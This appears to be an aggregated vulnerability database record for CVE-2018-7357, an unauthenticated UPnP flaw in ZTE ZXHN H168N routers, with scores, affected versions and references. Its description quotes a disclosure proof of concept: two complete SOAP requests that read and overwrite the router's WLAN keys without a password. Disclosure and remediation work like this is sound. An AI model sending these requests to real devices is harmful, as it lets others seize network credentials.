ID

VAR-201811-0983


CVE

CVE-2018-7357


TITLE

Vulnerabilities related to certificate and password management in ZTE ZXHN H168N products

Trust: 0.8

sources: JVNDB: JVNDB-2018-012682

DESCRIPTION

ZTE ZXHN H168N product versions V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T have an improper access control vulnerability, which may allow an unauthorized user to gain unauthorized access. The ZTE ZXHN H168N product contains vulnerabilities related to certificate and password management. Information may be obtained or altered, and service operation may be disrupted (DoS). ZTE ZXHN H168N is prone to an authorization-bypass vulnerability. ZTE ZXHN H168N versions 2.2.0_PK1.2T5, 2.2.0_PK1.2T2, 2.2.0_PK11T7 and 2.2.0_PK11T are vulnerable. ZTE ZXHN H168N is a wireless VDSL router from ZTE Corporation (ZTE) of China. The following versions are affected: ZTE ZXHN H168N V2.2.0_PK1.2T5, V2.2.0_PK1.2T2, V2.2.0_PK11T7 and V2.2.0_PK11T.

[*] POC: (CVE-2018-7357 and CVE-2018-7358)

Disclaimer: [This POC is for Educational Purposes, I would Not be responsible for any misuse of the information mentioned in this blog post]

[+] Unauthenticated
[+] Author: Usman Saeed (usman [at] xc0re.net)
[+] Protocol: UPnP
[+] Affected Hardware/Software:
    Model name: ZXHN H168N v2.2
    Build Timestamp: 20171127193202
    Software Version: V2.2.0_PK1.2T5

[+] Findings:

1. Unauthenticated access to WLAN password:

    POST /control/igd/wlanc_1_1 HTTP/1.1
    Host: <IP>:52869
    User-Agent: {omitted}
    Content-Length: 288
    Connection: close
    Content-Type: text/xml; charset="utf-8"
    SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"

    <?xml version="1.0" encoding="utf-8"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>

2. Unauthenticated WLAN passphrase change:

    POST /control/igd/wlanc_1_1 HTTP/1.1
    Host: <IP>:52869
    User-Agent: {omitted}
    Content-Length: 496
    Connection: close
    Content-Type: text/xml; charset="utf-8"
    SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

    <?xml version="1.0" encoding="utf-8"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>

[*] Solution: UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.

[*] Note: There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.

[+] Responsible Disclosure:
    Vulnerabilities identified - 20 August, 2018
    Reported to ZTE - 28 August, 2018
    ZTE official statement - 17 September 2018
    ZTE patched the vulnerability - 12 November 2018
    The operator pushed the update - 12 November 2018
    CVE published - CVE-2018-7357 and CVE-2018-7358
    Public disclosure - 12 November 2018

Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522

Trust: 2.07

sources: NVD: CVE-2018-7357 // JVNDB: JVNDB-2018-012682 // BID: 105983 // VULHUB: VHN-137389 // PACKETSTORM: 150728

AFFECTED PRODUCTS

vendor: zte, model: zxhn h168n, scope: eq, version: 2.2.0_pk1.2t2

Trust: 2.4

vendor: zte, model: zxhn h168n, scope: eq, version: 2.2.0_pk1.2t5

Trust: 2.4

vendor: zte, model: zxhn h168n, scope: eq, version: 2.2.0_pk11t

Trust: 2.4

vendor: zte, model: zxhn h168n, scope: eq, version: 2.2.0_pk11t7

Trust: 2.4

vendor: zte, model: zxhn h168n 2.2.0 pk11t7, scope: -, version: -

Trust: 0.3

vendor: zte, model: zxhn h168n 2.2.0 pk11t, scope: -, version: -

Trust: 0.3

vendor: zte, model: zxhn h168n 2.2.0 pk1.2t5, scope: -, version: -

Trust: 0.3

vendor: zte, model: zxhn h168n 2.2.0 pk1.2t2, scope: -, version: -

Trust: 0.3

vendor: zte, model: zxhn h168n 2.2.0 pk1.2t6, scope: ne, version: -

Trust: 0.3

sources: BID: 105983 // JVNDB: JVNDB-2018-012682 // CNNVD: CNNVD-201811-444 // NVD: CVE-2018-7357

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-7357
value: HIGH

Trust: 1.0

psirt@zte.com.cn: CVE-2018-7357
value: MEDIUM

Trust: 1.0

NVD: CVE-2018-7357
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201811-444
value: HIGH

Trust: 0.6

VULHUB: VHN-137389
value: LOW

Trust: 0.1

nvd@nist.gov: CVE-2018-7357
severity: LOW
baseScore: 3.3
vectorString: AV:A/AC:L/AU:N/C:P/I:N/A:N
accessVector: ADJACENT_NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 6.5
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-137389
severity: LOW
baseScore: 3.3
vectorString: AV:A/AC:L/AU:N/C:P/I:N/A:N
accessVector: ADJACENT_NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 6.5
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-7357
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: ADJACENT
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.0

Trust: 1.8

psirt@zte.com.cn: CVE-2018-7357
baseSeverity: MEDIUM
baseScore: 6.5
vectorString: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector: ADJACENT
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 3.6
version: 3.0

Trust: 1.0

sources: VULHUB: VHN-137389 // JVNDB: JVNDB-2018-012682 // CNNVD: CNNVD-201811-444 // NVD: CVE-2018-7357 // NVD: CVE-2018-7357

PROBLEMTYPE DATA

problemtype:CWE-306

Trust: 1.1

problemtype:CWE-255

Trust: 0.8

sources: VULHUB: VHN-137389 // JVNDB: JVNDB-2018-012682 // NVD: CVE-2018-7357

THREAT TYPE

remote or local

Trust: 0.6

sources: CNNVD: CNNVD-201811-444

TYPE

access control error

Trust: 0.6

sources: CNNVD: CNNVD-201811-444

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-012682

PATCH

title: Improper Authorization Vulnerabilities in ZTE ZXHN H168N Product
url: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009523

Trust: 0.8

title: ZTE ZXHN H168N Security vulnerabilities
url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=86847

Trust: 0.6

sources: JVNDB: JVNDB-2018-012682 // CNNVD: CNNVD-201811-444

EXTERNAL IDS

db: NVD, id: CVE-2018-7357

Trust: 2.9

db: ZTE, id: 1009523

Trust: 2.0

db: EXPLOIT-DB, id: 45972

Trust: 1.7

db: JVNDB, id: JVNDB-2018-012682

Trust: 0.8

db: CNNVD, id: CNNVD-201811-444

Trust: 0.7

db: BID, id: 105983

Trust: 0.3

db: PACKETSTORM, id: 150728

Trust: 0.2

db: VULHUB, id: VHN-137389

Trust: 0.1

db: ZTE, id: 1009522

Trust: 0.1

sources: VULHUB: VHN-137389 // BID: 105983 // JVNDB: JVNDB-2018-012682 // PACKETSTORM: 150728 // CNNVD: CNNVD-201811-444 // NVD: CVE-2018-7357

REFERENCES

url:http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009523

Trust: 2.0

url:https://www.exploit-db.com/exploits/45972/

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2018-7357

Trust: 0.9

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7357

Trust: 0.8

url:http://www.zte.com.cn/

Trust: 0.3

url:http://support.zte.com.cn/support/news/loopholeinfodetail.aspx?newsid=1009522

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-7358

Trust: 0.1

sources: VULHUB: VHN-137389 // BID: 105983 // JVNDB: JVNDB-2018-012682 // PACKETSTORM: 150728 // CNNVD: CNNVD-201811-444 // NVD: CVE-2018-7357

CREDITS

Usman Saeed

Trust: 0.4

sources: BID: 105983 // PACKETSTORM: 150728

SOURCES

db: VULHUB, id: VHN-137389
db: BID, id: 105983
db: JVNDB, id: JVNDB-2018-012682
db: PACKETSTORM, id: 150728
db: CNNVD, id: CNNVD-201811-444
db: NVD, id: CVE-2018-7357

LAST UPDATE DATE

2024-11-23T22:30:10.977000+00:00


SOURCES UPDATE DATE

db: VULHUB, id: VHN-137389, date: 2019-10-09T00:00:00
db: BID, id: 105983, date: 2018-09-17T00:00:00
db: JVNDB, id: JVNDB-2018-012682, date: 2019-02-06T00:00:00
db: CNNVD, id: CNNVD-201811-444, date: 2019-10-17T00:00:00
db: NVD, id: CVE-2018-7357, date: 2024-11-21T04:12:03.790

SOURCES RELEASE DATE

db: VULHUB, id: VHN-137389, date: 2018-11-14T00:00:00
db: BID, id: 105983, date: 2018-09-17T00:00:00
db: JVNDB, id: JVNDB-2018-012682, date: 2019-02-06T00:00:00
db: PACKETSTORM, id: 150728, date: 2018-12-11T01:49:45
db: CNNVD, id: CNNVD-201811-444, date: 2018-11-15T00:00:00
db: NVD, id: CVE-2018-7357, date: 2018-11-14T15:29:02.187